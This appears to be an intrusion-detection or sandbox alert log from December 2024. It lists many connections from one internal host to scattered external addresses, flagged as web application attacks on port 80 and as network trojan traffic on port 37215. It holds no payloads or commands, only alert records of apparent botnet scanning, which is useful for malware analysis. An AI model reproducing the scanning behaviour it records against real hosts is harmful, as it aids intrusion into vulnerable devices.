          2024-12-03T22:17:26.556188+010020290341Web Application Attack192.168.2.234292496.211.14.13680TCP
          2024-12-03T22:17:26.561647+010020290341Web Application Attack192.168.2.2355370222.149.156.5980TCP
          2024-12-03T22:17:26.562032+010020290341Web Application Attack192.168.2.234004452.243.132.9080TCP
          2024-12-03T22:17:26.570798+010020290341Web Application Attack192.168.2.2344772167.48.89.1180TCP
          2024-12-03T22:17:26.571191+010020290341Web Application Attack192.168.2.235112473.34.85.14880TCP
          2024-12-03T22:17:26.586504+010020290341Web Application Attack192.168.2.23383362.132.182.10480TCP
          2024-12-03T22:17:26.586538+010020290341Web Application Attack192.168.2.2343984184.133.164.17280TCP
          2024-12-03T22:17:26.602131+010020290341Web Application Attack192.168.2.2334674119.62.113.14880TCP
          2024-12-03T22:17:26.749406+010020290341Web Application Attack192.168.2.2336326104.129.192.3080TCP
          2024-12-03T22:17:26.749518+010020290341Web Application Attack192.168.2.23603341.48.153.3180TCP
          2024-12-03T22:17:26.764892+010020290341Web Application Attack192.168.2.2342330193.81.123.15580TCP
          2024-12-03T22:17:26.765066+010020290341Web Application Attack192.168.2.2347286132.121.27.12680TCP
          2024-12-03T22:17:26.765428+010020290341Web Application Attack192.168.2.234225240.201.96.6980TCP
          2024-12-03T22:17:26.765614+010020290341Web Application Attack192.168.2.2344292147.169.251.380TCP
          2024-12-03T22:17:26.774039+010020290341Web Application Attack192.168.2.234852485.166.29.8880TCP
          2024-12-03T22:17:26.796259+010020290341Web Application Attack192.168.2.2351890152.18.186.5280TCP
          2024-12-03T22:17:26.814309+010020290341Web Application Attack192.168.2.2333484180.33.117.14180TCP
          2024-12-03T22:17:26.821008+010020290341Web Application Attack192.168.2.234295831.153.242.17780TCP
          2024-12-03T22:17:27.546201+010020290341Web Application Attack192.168.2.2360112208.160.36.11080TCP
          2024-12-03T22:17:27.603258+010020290341Web Application Attack192.168.2.235318423.65.54.7880TCP
          2024-12-03T22:17:27.868161+010020290341Web Application Attack192.168.2.2347950128.53.112.20380TCP
          2024-12-03T22:17:27.868168+010020290341Web Application Attack192.168.2.234616050.40.222.21880TCP
          2024-12-03T22:17:27.868187+010020290341Web Application Attack192.168.2.2341558159.129.33.5780TCP
          2024-12-03T22:17:27.868189+010020290341Web Application Attack192.168.2.235221474.140.209.20180TCP
          2024-12-03T22:17:27.868193+010020290341Web Application Attack192.168.2.2345414119.7.68.10880TCP
          2024-12-03T22:17:27.868193+010020290341Web Application Attack192.168.2.2355606130.99.153.14580TCP
          2024-12-03T22:17:27.868195+010020290341Web Application Attack192.168.2.2338814213.127.9.24480TCP
          2024-12-03T22:17:27.868232+010020290341Web Application Attack192.168.2.23579724.20.92.22380TCP
          2024-12-03T22:17:27.868233+010020290341Web Application Attack192.168.2.234759076.92.78.11280TCP
          2024-12-03T22:17:27.868346+010020290341Web Application Attack192.168.2.235686053.16.184.8180TCP
          2024-12-03T22:17:27.868346+010020290341Web Application Attack192.168.2.2357376140.209.104.12980TCP
          2024-12-03T22:17:27.868348+010020290341Web Application Attack192.168.2.233624095.242.147.17780TCP
          2024-12-03T22:17:27.868404+010020290341Web Application Attack192.168.2.2343478122.93.228.24880TCP
          2024-12-03T22:17:27.868480+010020290341Web Application Attack192.168.2.2349214219.175.97.7180TCP
          2024-12-03T22:17:27.884681+010020290341Web Application Attack192.168.2.234726899.147.210.3880TCP
          2024-12-03T22:17:27.915236+010020290341Web Application Attack192.168.2.2359144166.63.105.9880TCP
          2024-12-03T22:17:28.514799+010020290341Web Application Attack192.168.2.2333834151.51.89.7280TCP
          2024-12-03T22:17:28.524144+010020290341Web Application Attack192.168.2.235854283.86.34.1080TCP
          2024-12-03T22:17:28.530399+010020290341Web Application Attack192.168.2.235980046.71.5.5680TCP
          2024-12-03T22:17:28.530641+010020290341Web Application Attack192.168.2.234358488.81.6.18580TCP
          2024-12-03T22:17:28.530873+010020290341Web Application Attack192.168.2.2352350211.150.95.16280TCP
          2024-12-03T22:17:28.545985+010020290341Web Application Attack192.168.2.2355088197.148.94.12780TCP
          2024-12-03T22:17:28.546181+010020290341Web Application Attack192.168.2.2355098193.157.209.11680TCP
          2024-12-03T22:17:28.561632+010020290341Web Application Attack192.168.2.2339322216.253.100.1880TCP
          2024-12-03T22:17:28.561975+010020290341Web Application Attack192.168.2.235468027.102.158.5280TCP
          2024-12-03T22:17:28.561993+010020290341Web Application Attack192.168.2.2336022104.35.149.16280TCP
          2024-12-03T22:17:28.562017+010020290341Web Application Attack192.168.2.23514401.52.172.13580TCP
          2024-12-03T22:17:28.586439+010020290341Web Application Attack192.168.2.2342808170.77.116.12780TCP
          2024-12-03T22:17:28.586527+010020290341Web Application Attack192.168.2.2335946130.49.81.23880TCP
          2024-12-03T22:17:28.592866+010020290341Web Application Attack192.168.2.234054265.194.145.24080TCP
          2024-12-03T22:17:28.593006+010020290341Web Application Attack192.168.2.2340340213.151.138.12780TCP
          2024-12-03T22:17:28.593280+010020290341Web Application Attack192.168.2.2342166189.137.32.2680TCP
          2024-12-03T22:17:28.593393+010020290341Web Application Attack192.168.2.235082434.161.39.680TCP
          2024-12-03T22:17:28.593495+010020290341Web Application Attack192.168.2.2353992165.123.114.13180TCP
          2024-12-03T22:17:28.593667+010020290341Web Application Attack192.168.2.235300254.67.175.480TCP
          2024-12-03T22:17:28.602051+010020290341Web Application Attack192.168.2.2338844153.143.252.15580TCP
          2024-12-03T22:17:28.602136+010020290341Web Application Attack192.168.2.2351316198.209.119.5280TCP
          2024-12-03T22:17:28.602232+010020290341Web Application Attack192.168.2.2335174121.31.140.12580TCP
          2024-12-03T22:17:28.602324+010020290341Web Application Attack192.168.2.233672665.145.54.8380TCP
          2024-12-03T22:17:28.602453+010020290341Web Application Attack192.168.2.23330104.190.171.5180TCP
          2024-12-03T22:17:28.602534+010020290341Web Application Attack192.168.2.235545266.188.144.20180TCP
          2024-12-03T22:17:28.602620+010020290341Web Application Attack192.168.2.2356882201.128.240.19080TCP
          2024-12-03T22:17:28.602760+010020290341Web Application Attack192.168.2.2353938167.66.184.22180TCP
          2024-12-03T22:17:28.617650+010020290341Web Application Attack192.168.2.236041424.130.50.11980TCP
          2024-12-03T22:17:28.617741+010020290341Web Application Attack192.168.2.235677084.64.138.17480TCP
          2024-12-03T22:17:28.618004+010020290341Web Application Attack192.168.2.2339636159.94.198.20680TCP
          2024-12-03T22:17:28.633814+010020290341Web Application Attack192.168.2.2351468174.205.29.20180TCP
          2024-12-03T22:17:28.633835+010020290341Web Application Attack192.168.2.2349068145.181.27.6280TCP
          2024-12-03T22:17:28.690800+010020290341Web Application Attack192.168.2.234595031.44.219.14880TCP
          2024-12-03T22:17:28.780818+010020290341Web Application Attack192.168.2.2344874173.230.202.4780TCP
          2024-12-03T22:17:28.814523+010020290341Web Application Attack192.168.2.233383464.128.159.23980TCP
          2024-12-03T22:17:28.819043+010020290341Web Application Attack192.168.2.2355146152.101.156.15280TCP
          2024-12-03T22:17:28.820842+010020290341Web Application Attack192.168.2.2343798197.132.81.16180TCP
          2024-12-03T22:17:28.825955+010020290341Web Application Attack192.168.2.233358258.186.27.2880TCP
          2024-12-03T22:17:28.827205+010020290341Web Application Attack192.168.2.2338550132.72.173.5480TCP
          2024-12-03T22:17:28.852128+010020290341Web Application Attack192.168.2.233326641.52.97.20580TCP
          2024-12-03T22:17:28.868121+010020290341Web Application Attack192.168.2.235422675.133.121.18380TCP
          2024-12-03T22:17:28.899202+010020290341Web Application Attack192.168.2.2350056199.210.40.1980TCP
          2024-12-03T22:17:29.852239+010020290341Web Application Attack192.168.2.233452819.72.54.14880TCP
          2024-12-03T22:17:29.890287+010020290341Web Application Attack192.168.2.234399260.107.3.19780TCP
          2024-12-03T22:17:29.898980+010020290341Web Application Attack192.168.2.2341636115.201.93.8680TCP
          2024-12-03T22:17:29.899200+010020290341Web Application Attack192.168.2.2356466133.82.186.5680TCP
          2024-12-03T22:17:29.905440+010020290341Web Application Attack192.168.2.233574638.198.70.8580TCP
          2024-12-03T22:17:29.921221+010020290341Web Application Attack192.168.2.2335168212.255.25.2980TCP
          2024-12-03T22:17:29.936959+010020290341Web Application Attack192.168.2.2333068177.162.222.14180TCP
          2024-12-03T22:17:29.937019+010020290341Web Application Attack192.168.2.2346532198.182.59.17180TCP
          2024-12-03T22:17:29.952483+010020290341Web Application Attack192.168.2.234779672.191.2.15480TCP
          2024-12-03T22:17:29.977259+010020290341Web Application Attack192.168.2.2345194171.42.171.20980TCP
          2024-12-03T22:17:29.977500+010020290341Web Application Attack192.168.2.234002247.154.42.24980TCP
          2024-12-03T22:17:29.977600+010020290341Web Application Attack192.168.2.2335706100.184.128.4280TCP
          2024-12-03T22:17:30.522011+010020290341Web Application Attack192.168.2.2341164108.157.64.8580TCP
          2024-12-03T22:17:30.813583+010020290341Web Application Attack192.168.2.23451582.112.110.19580TCP
          2024-12-03T22:17:30.813600+010020290341Web Application Attack192.168.2.234426670.62.179.4180TCP
          2024-12-03T22:17:30.842935+010020290341Web Application Attack192.168.2.2335624126.207.149.17380TCP
          2024-12-03T22:17:30.842949+010020290341Web Application Attack192.168.2.2349800110.147.154.4480TCP
          2024-12-03T22:17:30.843513+010020290341Web Application Attack192.168.2.2332992124.158.8.20880TCP
          2024-12-03T22:17:30.843521+010020290341Web Application Attack192.168.2.2344168216.39.174.17980TCP
          2024-12-03T22:17:30.843539+010020290341Web Application Attack192.168.2.235976058.174.175.1080TCP
          2024-12-03T22:17:30.843558+010020290341Web Application Attack192.168.2.2343494181.161.118.480TCP
          2024-12-03T22:17:30.868432+010020290341Web Application Attack192.168.2.234731069.137.126.1680TCP
          2024-12-03T22:17:30.868447+010020290341Web Application Attack192.168.2.2333848169.16.2.1980TCP
          2024-12-03T22:17:30.871451+010020290341Web Application Attack192.168.2.235768439.107.190.18680TCP
          2024-12-03T22:17:30.874633+010020290341Web Application Attack192.168.2.235537427.214.244.9980TCP
          2024-12-03T22:17:30.874636+010020290341Web Application Attack192.168.2.2358582156.88.184.3980TCP
          2024-12-03T22:17:30.874638+010020290341Web Application Attack192.168.2.233706851.238.123.24980TCP
          2024-12-03T22:17:30.874659+010020290341Web Application Attack192.168.2.234905242.204.247.080TCP
          2024-12-03T22:17:30.883606+010020290341Web Application Attack192.168.2.2355402140.48.108.480TCP
          2024-12-03T22:17:30.883629+010020290341Web Application Attack192.168.2.235459673.8.27.18980TCP
          2024-12-03T22:17:30.889909+010020290341Web Application Attack192.168.2.23500525.72.202.8380TCP
          2024-12-03T22:17:30.890447+010020290341Web Application Attack192.168.2.233554263.181.115.21880TCP
          2024-12-03T22:17:30.890460+010020290341Web Application Attack192.168.2.234996823.247.191.23580TCP
          2024-12-03T22:17:30.890478+010020290341Web Application Attack192.168.2.233630462.10.205.21780TCP
          2024-12-03T22:17:30.891069+010020290341Web Application Attack192.168.2.235207835.76.116.4080TCP
          2024-12-03T22:17:30.891071+010020290341Web Application Attack192.168.2.2344966150.22.167.22480TCP
          2024-12-03T22:17:30.891075+010020290341Web Application Attack192.168.2.2355510190.209.237.13580TCP
          2024-12-03T22:17:30.891079+010020290341Web Application Attack192.168.2.2333086124.36.163.1580TCP
          2024-12-03T22:17:30.891559+010020290341Web Application Attack192.168.2.2347754136.230.17.22780TCP
          2024-12-03T22:17:30.891580+010020290341Web Application Attack192.168.2.235501238.44.88.8480TCP
          2024-12-03T22:17:30.899305+010020290341Web Application Attack192.168.2.2339588220.17.106.680TCP
          2024-12-03T22:17:30.899592+010020290341Web Application Attack192.168.2.2358626105.244.168.9580TCP
          2024-12-03T22:17:30.899927+010020290341Web Application Attack192.168.2.2350226177.251.155.12480TCP
          2024-12-03T22:17:30.900494+010020290341Web Application Attack192.168.2.2343066201.144.89.14880TCP
          2024-12-03T22:17:30.900500+010020290341Web Application Attack192.168.2.2332844200.142.198.13580TCP
          2024-12-03T22:17:30.931332+010020290341Web Application Attack192.168.2.2345184172.250.40.7680TCP
          2024-12-03T22:17:30.931362+010020290341Web Application Attack192.168.2.2333758132.110.148.17080TCP
          2024-12-03T22:17:30.931385+010020290341Web Application Attack192.168.2.234530686.70.243.9680TCP
          2024-12-03T22:17:30.931406+010020290341Web Application Attack192.168.2.2357008200.140.138.14780TCP
          2024-12-03T22:17:30.945979+010020290341Web Application Attack192.168.2.236024071.219.12.13180TCP
          2024-12-03T22:17:31.820072+010020290341Web Application Attack192.168.2.2357572160.2.24.18780TCP
          2024-12-03T22:17:31.836861+010020290341Web Application Attack192.168.2.2350578218.29.246.1680TCP
          2024-12-03T22:17:31.843144+010020290341Web Application Attack192.168.2.2343988198.32.122.22880TCP
          2024-12-03T22:17:31.852131+010020290341Web Application Attack192.168.2.236068463.137.95.6480TCP
          2024-12-03T22:17:31.858490+010020290341Web Application Attack192.168.2.233830675.182.33.24680TCP
          2024-12-03T22:17:31.858583+010020290341Web Application Attack192.168.2.233585292.179.185.10980TCP
          2024-12-03T22:17:31.899042+010020290341Web Application Attack192.168.2.2357676180.220.252.8380TCP
          2024-12-03T22:17:31.930195+010020290341Web Application Attack192.168.2.2350926115.66.129.3280TCP
          2024-12-03T22:17:31.936793+010020290341Web Application Attack192.168.2.233359437.123.150.15380TCP
          2024-12-03T22:17:32.015284+010020290341Web Application Attack192.168.2.2348782195.200.142.2380TCP
          2024-12-03T22:17:32.040085+010020290341Web Application Attack192.168.2.234295863.80.245.21680TCP
          2024-12-03T22:17:33.265038+010020290341Web Application Attack192.168.2.23576602.93.19.23680TCP
          2024-12-03T22:17:34.218379+010020290341Web Application Attack192.168.2.234338647.93.110.14380TCP
          2024-12-03T22:17:34.321112+010020290341Web Application Attack192.168.2.2335864204.181.218.4880TCP
          2024-12-03T22:17:34.343131+010020290341Web Application Attack192.168.2.2357022124.30.74.11880TCP
          2024-12-03T22:17:34.343141+010020290341Web Application Attack192.168.2.2359466208.169.160.19180TCP
          2024-12-03T22:17:34.399229+010020290341Web Application Attack192.168.2.234089686.145.3.2280TCP
          2024-12-03T22:17:34.399310+010020290341Web Application Attack192.168.2.235734477.152.79.14880TCP
          2024-12-03T22:17:34.399528+010020290341Web Application Attack192.168.2.2358040106.87.32.19880TCP
          2024-12-03T22:17:34.421982+010020290341Web Application Attack192.168.2.2342840148.155.181.19180TCP
          2024-12-03T22:17:34.430361+010020290341Web Application Attack192.168.2.234937834.11.119.3580TCP
          2024-12-03T22:17:34.445914+010020290341Web Application Attack192.168.2.234060880.179.13.14680TCP
          2024-12-03T22:17:34.452467+010020290341Web Application Attack192.168.2.2342728178.197.238.16980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-03T22:16:57.701713+010028352221A Network Trojan was detected192.168.2.2336064197.4.255.17137215TCP
          2024-12-03T22:17:02.741173+010028352221A Network Trojan was detected192.168.2.233866441.71.190.20337215TCP
          2024-12-03T22:17:02.899626+010028352221A Network Trojan was detected192.168.2.2347242156.231.61.4637215TCP
          2024-12-03T22:17:03.104975+010028352221A Network Trojan was detected192.168.2.235884441.215.18.13437215TCP
          2024-12-03T22:17:05.982297+010028352221A Network Trojan was detected192.168.2.2352546156.229.62.23737215TCP
          2024-12-03T22:17:06.318955+010028352221A Network Trojan was detected192.168.2.2352484197.7.168.11937215TCP
          2024-12-03T22:17:09.420536+010028352221A Network Trojan was detected192.168.2.2359658156.21.203.12237215TCP
          2024-12-03T22:17:09.603237+010028352221A Network Trojan was detected192.168.2.2338366156.41.220.18837215TCP
          2024-12-03T22:17:09.603665+010028352221A Network Trojan was detected192.168.2.2351230197.137.137.13237215TCP
          2024-12-03T22:17:11.360450+010028352221A Network Trojan was detected192.168.2.2348250156.232.91.737215TCP
          2024-12-03T22:17:11.472007+010028352221A Network Trojan was detected192.168.2.2344360156.101.171.5437215TCP
          2024-12-03T22:17:11.592791+010028352221A Network Trojan was detected192.168.2.2352870156.126.99.23937215TCP
          2024-12-03T22:17:12.586366+010028352221A Network Trojan was detected192.168.2.2356452197.193.108.12037215TCP
          2024-12-03T22:17:12.592509+010028352221A Network Trojan was detected192.168.2.2357304197.132.62.11937215TCP
          2024-12-03T22:17:12.592650+010028352221A Network Trojan was detected192.168.2.233337041.30.218.20737215TCP
          2024-12-03T22:17:12.601888+010028352221A Network Trojan was detected192.168.2.2339548156.81.76.1037215TCP
          2024-12-03T22:17:12.624095+010028352221A Network Trojan was detected192.168.2.2353450197.166.40.13337215TCP
          2024-12-03T22:17:12.639583+010028352221A Network Trojan was detected192.168.2.2342194197.26.74.23737215TCP
          2024-12-03T22:17:12.648840+010028352221A Network Trojan was detected192.168.2.233818841.7.124.2537215TCP
          2024-12-03T22:17:12.664585+010028352221A Network Trojan was detected192.168.2.2339518156.170.127.6937215TCP
          2024-12-03T22:17:13.823878+010028352221A Network Trojan was detected192.168.2.2356048197.105.173.17037215TCP
          2024-12-03T22:17:14.742508+010028352221A Network Trojan was detected192.168.2.2353260197.235.112.16037215TCP
          2024-12-03T22:17:15.935363+010028352221A Network Trojan was detected192.168.2.2342236197.1.206.13937215TCP
          2024-12-03T22:17:15.967638+010028352221A Network Trojan was detected192.168.2.235076241.67.28.5537215TCP
          2024-12-03T22:17:16.008813+010028352221A Network Trojan was detected192.168.2.2353344156.100.250.17037215TCP
          2024-12-03T22:17:16.015072+010028352221A Network Trojan was detected192.168.2.2350676156.13.215.13237215TCP
          2024-12-03T22:17:16.023873+010028352221A Network Trojan was detected192.168.2.2348634156.210.38.12737215TCP
          2024-12-03T22:17:16.023930+010028352221A Network Trojan was detected192.168.2.2356676197.199.137.23237215TCP
          2024-12-03T22:17:16.023994+010028352221A Network Trojan was detected192.168.2.2335002197.81.175.20637215TCP
          2024-12-03T22:17:16.055204+010028352221A Network Trojan was detected192.168.2.2344256156.219.192.22337215TCP
          2024-12-03T22:17:16.842698+010028352221A Network Trojan was detected192.168.2.235113441.72.40.18637215TCP
          2024-12-03T22:17:16.842888+010028352221A Network Trojan was detected192.168.2.2337630156.127.117.24837215TCP
          2024-12-03T22:17:16.873950+010028352221A Network Trojan was detected192.168.2.2354208156.173.48.637215TCP
          2024-12-03T22:17:16.874291+010028352221A Network Trojan was detected192.168.2.2350414156.142.216.1937215TCP
          2024-12-03T22:17:16.889567+010028352221A Network Trojan was detected192.168.2.2353894197.125.185.13337215TCP
          2024-12-03T22:17:16.889720+010028352221A Network Trojan was detected192.168.2.2350260156.110.116.19237215TCP
          2024-12-03T22:17:16.946143+010028352221A Network Trojan was detected192.168.2.2338364156.30.63.2537215TCP
          2024-12-03T22:17:16.967815+010028352221A Network Trojan was detected192.168.2.2345572156.234.118.11537215TCP
          2024-12-03T22:17:16.967895+010028352221A Network Trojan was detected192.168.2.2360136156.138.215.21037215TCP
          2024-12-03T22:17:17.014825+010028352221A Network Trojan was detected192.168.2.2340734197.236.127.1937215TCP
          2024-12-03T22:17:17.039542+010028352221A Network Trojan was detected192.168.2.235384641.195.129.20137215TCP
          2024-12-03T22:17:17.039545+010028352221A Network Trojan was detected192.168.2.2355242197.199.156.637215TCP
          2024-12-03T22:17:17.039728+010028352221A Network Trojan was detected192.168.2.2357052197.36.67.9537215TCP
          2024-12-03T22:17:17.054985+010028352221A Network Trojan was detected192.168.2.235564041.48.156.16737215TCP
          2024-12-03T22:17:19.024060+010028352221A Network Trojan was detected192.168.2.2358934156.136.30.8337215TCP
          2024-12-03T22:17:19.030400+010028352221A Network Trojan was detected192.168.2.2357838197.205.167.25037215TCP
          2024-12-03T22:17:19.196043+010028352221A Network Trojan was detected192.168.2.2342506197.120.156.11937215TCP
          2024-12-03T22:17:19.196045+010028352221A Network Trojan was detected192.168.2.2343724197.102.235.7737215TCP
          2024-12-03T22:17:19.264566+010028352221A Network Trojan was detected192.168.2.2338640156.218.59.21237215TCP
          2024-12-03T22:17:19.295944+010028352221A Network Trojan was detected192.168.2.233586241.43.153.4337215TCP
          2024-12-03T22:17:19.296135+010028352221A Network Trojan was detected192.168.2.2351316197.17.103.8637215TCP
          2024-12-03T22:17:19.296145+010028352221A Network Trojan was detected192.168.2.2341050197.159.147.4637215TCP
          2024-12-03T22:17:19.305303+010028352221A Network Trojan was detected192.168.2.234142841.14.50.4437215TCP
          2024-12-03T22:17:19.351922+010028352221A Network Trojan was detected192.168.2.236054241.208.59.23937215TCP
          2024-12-03T22:17:19.352131+010028352221A Network Trojan was detected192.168.2.2333892197.127.87.8537215TCP
          2024-12-03T22:17:20.139545+010028352221A Network Trojan was detected192.168.2.2343246197.141.228.3537215TCP
          2024-12-03T22:17:20.155490+010028352221A Network Trojan was detected192.168.2.2336492156.102.50.10337215TCP
          2024-12-03T22:17:20.155541+010028352221A Network Trojan was detected192.168.2.2345398156.209.91.20737215TCP
          2024-12-03T22:17:20.155636+010028352221A Network Trojan was detected192.168.2.2334020197.132.239.11037215TCP
          2024-12-03T22:17:20.170760+010028352221A Network Trojan was detected192.168.2.234710641.109.98.5637215TCP
          2024-12-03T22:17:20.180101+010028352221A Network Trojan was detected192.168.2.234209441.117.51.10837215TCP
          2024-12-03T22:17:20.186437+010028352221A Network Trojan was detected192.168.2.2348328156.7.85.12737215TCP
          2024-12-03T22:17:20.186569+010028352221A Network Trojan was detected192.168.2.2358618197.118.170.21037215TCP
          2024-12-03T22:17:20.195876+010028352221A Network Trojan was detected192.168.2.2342166197.17.71.16837215TCP
          2024-12-03T22:17:20.195899+010028352221A Network Trojan was detected192.168.2.2341958197.115.32.337215TCP
          2024-12-03T22:17:20.196050+010028352221A Network Trojan was detected192.168.2.234694441.254.131.16337215TCP
          2024-12-03T22:17:20.202162+010028352221A Network Trojan was detected192.168.2.2341560156.133.251.1337215TCP
          2024-12-03T22:17:20.202557+010028352221A Network Trojan was detected192.168.2.234268041.5.217.1937215TCP
          2024-12-03T22:17:20.211386+010028352221A Network Trojan was detected192.168.2.2337848197.103.210.19237215TCP
          2024-12-03T22:17:20.211546+010028352221A Network Trojan was detected192.168.2.2352378197.26.35.3937215TCP
          2024-12-03T22:17:20.211658+010028352221A Network Trojan was detected192.168.2.2354930156.9.30.4737215TCP
          2024-12-03T22:17:20.211786+010028352221A Network Trojan was detected192.168.2.2338532156.89.14.11937215TCP
          2024-12-03T22:17:20.227047+010028352221A Network Trojan was detected192.168.2.235862641.34.214.8737215TCP
          2024-12-03T22:17:20.227366+010028352221A Network Trojan was detected192.168.2.2333948197.33.53.11037215TCP
          2024-12-03T22:17:20.227370+010028352221A Network Trojan was detected192.168.2.2334878156.191.123.12037215TCP
          2024-12-03T22:17:20.227416+010028352221A Network Trojan was detected192.168.2.2344954197.133.93.22937215TCP
          2024-12-03T22:17:20.227514+010028352221A Network Trojan was detected192.168.2.2333562197.144.147.13237215TCP
          2024-12-03T22:17:20.227649+010028352221A Network Trojan was detected192.168.2.2335912197.145.151.25037215TCP
          2024-12-03T22:17:20.227883+010028352221A Network Trojan was detected192.168.2.234731441.220.241.14837215TCP
          2024-12-03T22:17:20.228016+010028352221A Network Trojan was detected192.168.2.234548241.59.198.16237215TCP
          2024-12-03T22:17:20.436806+010028352221A Network Trojan was detected192.168.2.2359774197.150.122.14537215TCP
          2024-12-03T22:17:20.467969+010028352221A Network Trojan was detected192.168.2.2338814197.164.229.13937215TCP
          2024-12-03T22:17:20.477070+010028352221A Network Trojan was detected192.168.2.2358030197.112.51.5137215TCP
          2024-12-03T22:17:20.477071+010028352221A Network Trojan was detected192.168.2.2354846156.103.184.21137215TCP
          2024-12-03T22:17:20.477115+010028352221A Network Trojan was detected192.168.2.234336441.45.183.25337215TCP
          2024-12-03T22:17:20.477239+010028352221A Network Trojan was detected192.168.2.2333108156.2.213.2937215TCP
          2024-12-03T22:17:22.312062+010028352221A Network Trojan was detected192.168.2.2346234156.126.205.17337215TCP
          2024-12-03T22:17:22.312282+010028352221A Network Trojan was detected192.168.2.2339432156.98.219.7637215TCP
          2024-12-03T22:17:22.320901+010028352221A Network Trojan was detected192.168.2.2360202156.244.187.19837215TCP
          2024-12-03T22:17:22.326997+010028352221A Network Trojan was detected192.168.2.233375241.147.45.16137215TCP
          2024-12-03T22:17:22.327813+010028352221A Network Trojan was detected192.168.2.2342722197.225.68.9137215TCP
          2024-12-03T22:17:22.328154+010028352221A Network Trojan was detected192.168.2.2358368197.127.1.20137215TCP
          2024-12-03T22:17:22.328328+010028352221A Network Trojan was detected192.168.2.234679441.179.220.25037215TCP
          2024-12-03T22:17:22.336394+010028352221A Network Trojan was detected192.168.2.233325641.90.157.19737215TCP
          2024-12-03T22:17:22.336704+010028352221A Network Trojan was detected192.168.2.2356236156.61.1.18437215TCP
          2024-12-03T22:17:22.336792+010028352221A Network Trojan was detected192.168.2.235353041.204.93.837215TCP
          2024-12-03T22:17:22.343088+010028352221A Network Trojan was detected192.168.2.2344924197.103.182.6737215TCP
          2024-12-03T22:17:22.343224+010028352221A Network Trojan was detected192.168.2.235942641.101.114.16937215TCP
          2024-12-03T22:17:22.352420+010028352221A Network Trojan was detected192.168.2.234973241.127.74.22637215TCP
          2024-12-03T22:17:22.352627+010028352221A Network Trojan was detected192.168.2.2344534156.69.249.25237215TCP
          2024-12-03T22:17:22.352636+010028352221A Network Trojan was detected192.168.2.2360458156.208.104.23337215TCP
          2024-12-03T22:17:22.368439+010028352221A Network Trojan was detected192.168.2.235175641.218.179.2537215TCP
          2024-12-03T22:17:22.384228+010028352221A Network Trojan was detected192.168.2.234775841.234.62.6337215TCP
          2024-12-03T22:17:22.477379+010028352221A Network Trojan was detected192.168.2.235122441.235.173.5337215TCP
          2024-12-03T22:17:23.593603+010028352221A Network Trojan was detected192.168.2.2337580197.133.185.11137215TCP
          2024-12-03T22:17:23.609059+010028352221A Network Trojan was detected192.168.2.2357836156.13.114.13337215TCP
          2024-12-03T22:17:23.618077+010028352221A Network Trojan was detected192.168.2.2340174156.105.61.837215TCP
          2024-12-03T22:17:23.618370+010028352221A Network Trojan was detected192.168.2.233343041.99.9.7837215TCP
          2024-12-03T22:17:23.624132+010028352221A Network Trojan was detected192.168.2.235172841.196.239.12737215TCP
          2024-12-03T22:17:23.624178+010028352221A Network Trojan was detected192.168.2.2340592197.221.96.25337215TCP
          2024-12-03T22:17:23.639907+010028352221A Network Trojan was detected192.168.2.235844841.206.26.23637215TCP
          2024-12-03T22:17:23.640102+010028352221A Network Trojan was detected192.168.2.2336116156.15.254.23337215TCP
          2024-12-03T22:17:23.648778+010028352221A Network Trojan was detected192.168.2.2344030197.83.152.13437215TCP
          2024-12-03T22:17:23.648967+010028352221A Network Trojan was detected192.168.2.2333492156.153.72.15337215TCP
          2024-12-03T22:17:24.648986+010028352221A Network Trojan was detected192.168.2.2335484156.118.69.16637215TCP
          2024-12-03T22:17:24.649265+010028352221A Network Trojan was detected192.168.2.2346742197.151.72.1437215TCP
          2024-12-03T22:17:25.090753+010028352221A Network Trojan was detected192.168.2.2344612197.214.201.24137215TCP
          2024-12-03T22:17:25.452266+010028352221A Network Trojan was detected192.168.2.2358910156.167.104.8637215TCP
          2024-12-03T22:17:25.467796+010028352221A Network Trojan was detected192.168.2.2340884156.59.68.1537215TCP
          2024-12-03T22:17:25.467948+010028352221A Network Trojan was detected192.168.2.233716441.233.58.22637215TCP
          2024-12-03T22:17:25.514768+010028352221A Network Trojan was detected192.168.2.235255841.196.234.20637215TCP
          2024-12-03T22:17:25.514770+010028352221A Network Trojan was detected192.168.2.2338046197.172.41.21637215TCP
          2024-12-03T22:17:25.514847+010028352221A Network Trojan was detected192.168.2.2356018197.20.71.8837215TCP
          2024-12-03T22:17:25.664505+010028352221A Network Trojan was detected192.168.2.235010441.152.153.12337215TCP
          2024-12-03T22:17:28.680318+010028352221A Network Trojan was detected192.168.2.235362041.134.113.10137215TCP
          2024-12-03T22:17:28.874326+010028352221A Network Trojan was detected192.168.2.2336082197.113.251.3037215TCP
          2024-12-03T22:17:28.890157+010028352221A Network Trojan was detected192.168.2.233546241.7.189.10137215TCP
          2024-12-03T22:17:28.952386+010028352221A Network Trojan was detected192.168.2.2357134197.45.37.4037215TCP
          2024-12-03T22:17:28.961661+010028352221A Network Trojan was detected192.168.2.234258241.105.24.14737215TCP
          2024-12-03T22:17:30.891588+010028352221A Network Trojan was detected192.168.2.2339982197.144.143.18137215TCP
          2024-12-03T22:17:31.196085+010028352221A Network Trojan was detected192.168.2.234932241.78.113.9637215TCP
          2024-12-03T22:17:31.202574+010028352221A Network Trojan was detected192.168.2.2340508156.52.61.11437215TCP
          2024-12-03T22:17:31.296082+010028352221A Network Trojan was detected192.168.2.2356274197.115.249.6737215TCP
          2024-12-03T22:17:31.311827+010028352221A Network Trojan was detected192.168.2.2335810156.92.200.137215TCP
          2024-12-03T22:17:31.311849+010028352221A Network Trojan was detected192.168.2.2354448156.169.1.9737215TCP
          2024-12-03T22:17:31.311870+010028352221A Network Trojan was detected192.168.2.2335610156.9.9.8937215TCP
          2024-12-03T22:17:31.321061+010028352221A Network Trojan was detected192.168.2.235768041.90.62.4037215TCP
          2024-12-03T22:17:31.327195+010028352221A Network Trojan was detected192.168.2.2359198197.93.50.2737215TCP
          2024-12-03T22:17:31.327254+010028352221A Network Trojan was detected192.168.2.234905241.14.17.14237215TCP
          2024-12-03T22:17:31.336454+010028352221A Network Trojan was detected192.168.2.234845241.196.59.17037215TCP
          2024-12-03T22:17:31.336588+010028352221A Network Trojan was detected192.168.2.235282841.125.152.21137215TCP
          2024-12-03T22:17:31.352359+010028352221A Network Trojan was detected192.168.2.2349904197.27.121.8737215TCP
          2024-12-03T22:17:31.893521+010028352221A Network Trojan was detected192.168.2.235161841.83.167.21337215TCP
          2024-12-03T22:17:32.180371+010028352221A Network Trojan was detected192.168.2.2352938156.59.49.12337215TCP
          2024-12-03T22:17:32.202497+010028352221A Network Trojan was detected192.168.2.2338276156.190.253.7837215TCP
